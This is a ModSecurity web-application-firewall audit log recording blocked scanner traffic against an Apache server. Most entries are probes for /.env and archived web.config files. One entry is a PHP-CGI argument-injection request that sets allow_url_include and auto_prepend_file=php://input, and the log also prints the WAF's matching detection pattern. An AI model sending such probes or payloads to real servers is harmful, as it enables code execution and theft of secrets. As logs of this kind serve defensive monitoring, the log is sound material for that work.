--75205b7f-A-- [14/Apr/2025:12:28:28 +0700] Z_yc_IgxSXM4jtK9zHGJTAAAAMI 103.236.140.4 58274 103.236.140.4 8181 --75205b7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.119.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.119.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75205b7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75205b7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608508623754 873 (- - -) Stopwatch2: 1744608508623754 873; combined=343, p1=307, p2=0, p3=0, p4=0, p5=36, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75205b7f-Z-- --e9746203-A-- [14/Apr/2025:12:30:24 +0700] Z_ydcNga3eJwvi_gLpI7jQAAAEs 103.236.140.4 58300 103.236.140.4 8181 --e9746203-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e9746203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9746203-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608624601730 916 (- - -) Stopwatch2: 1744608624601730 916; combined=421, p1=381, p2=0, p3=0, p4=0, p5=40, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9746203-Z-- --b6433502-A-- [14/Apr/2025:12:30:26 +0700] Z_ydctga3eJwvi_gLpI7jgAAAFA 103.236.140.4 58304 103.236.140.4 8181 --b6433502-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b6433502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6433502-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608626254920 886 (- - -) Stopwatch2: 1744608626254920 886; combined=417, p1=381, p2=0, p3=0, p4=0, p5=36, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6433502-Z-- --f1661c4e-A-- [14/Apr/2025:12:55:28 +0700] Z_yjUNga3eJwvi_gLpI7xgAAAFI 103.236.140.4 58522 103.236.140.4 8181 --f1661c4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --f1661c4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1661c4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744610128497816 828 (- - -) Stopwatch2: 1744610128497816 828; combined=332, p1=296, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1661c4e-Z-- --8f97a305-A-- [14/Apr/2025:13:29:35 +0700] Z_yrT1pzfFgMsbYwm2KeRAAAABY 103.236.140.4 58846 103.236.140.4 8181 --8f97a305-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8f97a305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f97a305-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744612175719845 13101 (- - -) Stopwatch2: 1744612175719845 13101; combined=25058, p1=223, p2=0, p3=0, p4=0, p5=12444, sr=66, sw=0, l=0, gc=12391 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f97a305-Z-- --d93e4467-A-- [14/Apr/2025:14:52:30 +0700] Z_y-vtga3eJwvi_gLpI8gQAAAEE 103.236.140.4 59800 103.236.140.4 8181 --d93e4467-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: http Connection: close Content-Length: 225 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d93e4467-C-- --d93e4467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d93e4467-E-- --d93e4467-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744617150844560 4354 (- - -) Stopwatch2: 1744617150844560 4354; combined=3122, p1=575, p2=2509, p3=0, p4=0, p5=38, sr=161, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d93e4467-Z-- --f905702b-A-- [14/Apr/2025:16:10:20 +0700] Z_zQ_FpzfFgMsbYwm2KfBwAAAAY 103.236.140.4 33230 103.236.140.4 8181 --f905702b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f905702b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f905702b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744621820084344 848 (- - -) Stopwatch2: 1744621820084344 848; combined=321, p1=284, p2=0, p3=0, p4=0, p5=36, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f905702b-Z-- --c617c712-A-- [14/Apr/2025:16:20:39 +0700] Z_zTZ9ga3eJwvi_gLpI85wAAAFM 103.236.140.4 33284 103.236.140.4 8181 --c617c712-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.115.37 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.115.37 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c617c712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c617c712-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744622439188762 773 (- - -) Stopwatch2: 1744622439188762 773; combined=335, p1=287, p2=0, p3=0, p4=0, p5=48, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c617c712-Z-- --93b7453e-A-- [14/Apr/2025:16:20:40 +0700] Z_zTaFpzfFgMsbYwm2KfEgAAABc 103.236.140.4 33288 103.236.140.4 8181 --93b7453e-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.115.37 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.115.37 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --93b7453e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b7453e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744622440537461 736 (- - -) Stopwatch2: 1744622440537461 736; combined=283, p1=255, p2=0, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b7453e-Z-- --51471036-A-- [14/Apr/2025:16:54:38 +0700] Z_zbXtPxEtam20ggC7hDYwAAAI0 103.236.140.4 33970 103.236.140.4 8181 --51471036-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --51471036-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51471036-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744624478968740 826 (- - -) Stopwatch2: 1744624478968740 826; combined=331, p1=296, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51471036-Z-- --28cdee2b-A-- [14/Apr/2025:17:04:20 +0700] Z_zdpNPxEtam20ggC7hDjgAAAJM 103.236.140.4 34158 103.236.140.4 8181 --28cdee2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --28cdee2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28cdee2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625060131999 875 (- - -) Stopwatch2: 1744625060131999 875; combined=401, p1=365, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28cdee2b-Z-- --707b5b56-A-- [14/Apr/2025:17:17:30 +0700] Z_zgutga3eJwvi_gLpI9JwAAAFY 103.236.140.4 34392 103.236.140.4 8181 --707b5b56-B-- GET /web.config.zip HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --707b5b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --707b5b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625850555965 712 (- - -) Stopwatch2: 1744625850555965 712; combined=299, p1=268, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --707b5b56-Z-- --7bf1c27c-A-- [14/Apr/2025:17:17:33 +0700] Z_zgvYgxSXM4jtK9zHGKLQAAAMQ 103.236.140.4 34420 103.236.140.4 8181 --7bf1c27c-B-- GET /web.config.rar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --7bf1c27c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bf1c27c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625853644779 703 (- - -) Stopwatch2: 1744625853644779 703; combined=277, p1=244, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bf1c27c-Z-- --82ca692f-A-- [14/Apr/2025:17:17:36 +0700] Z_zgwFpzfFgMsbYwm2KfqgAAAAk 103.236.140.4 34448 103.236.140.4 8181 --82ca692f-B-- GET /web.config.7z HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --82ca692f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82ca692f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625856749453 12834 (- - -) Stopwatch2: 1744625856749453 12834; combined=24642, p1=219, p2=0, p3=0, p4=0, p5=12228, sr=67, sw=0, l=0, gc=12195 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82ca692f-Z-- --af59064e-A-- [14/Apr/2025:17:17:39 +0700] Z_zgw4gxSXM4jtK9zHGKNQAAAM4 103.236.140.4 34476 103.236.140.4 8181 --af59064e-B-- GET /web.config.tar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --af59064e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af59064e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625859903034 648 (- - -) Stopwatch2: 1744625859903034 648; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af59064e-Z-- --09a7af1b-A-- [14/Apr/2025:17:17:43 +0700] Z_zgx1pzfFgMsbYwm2KfsAAAABQ 103.236.140.4 34504 103.236.140.4 8181 --09a7af1b-B-- GET /web.config.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --09a7af1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09a7af1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625863120974 670 (- - -) Stopwatch2: 1744625863120974 670; combined=252, p1=225, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09a7af1b-Z-- --5e0ee006-A-- [14/Apr/2025:17:17:46 +0700] Z_zgyogxSXM4jtK9zHGKPAAAANY 103.236.140.4 34532 103.236.140.4 8181 --5e0ee006-B-- GET /web.config.tar.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --5e0ee006-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e0ee006-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625866214480 626 (- - -) Stopwatch2: 1744625866214480 626; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e0ee006-Z-- --0af3364e-A-- [14/Apr/2025:17:39:47 +0700] Z_zl84gxSXM4jtK9zHGKTQAAAMM 103.236.140.4 34744 103.236.140.4 8181 --0af3364e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.217.244 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.217.244 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0af3364e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af3364e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744627187211480 826 (- - -) Stopwatch2: 1744627187211480 826; combined=345, p1=318, p2=0, p3=0, p4=0, p5=26, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af3364e-Z-- --52e6e34c-A-- [14/Apr/2025:17:53:26 +0700] Z_zpJlpzfFgMsbYwm2KfxQAAAAo 103.236.140.4 34840 103.236.140.4 8181 --52e6e34c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --52e6e34c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52e6e34c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628006181045 695 (- - -) Stopwatch2: 1744628006181045 695; combined=285, p1=245, p2=0, p3=0, p4=0, p5=39, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52e6e34c-Z-- --00eb3d51-A-- [14/Apr/2025:18:05:44 +0700] Z_zsCNPxEtam20ggC7hEFwAAAJg 103.236.140.4 34940 103.236.140.4 8181 --00eb3d51-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.136.184 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --00eb3d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00eb3d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 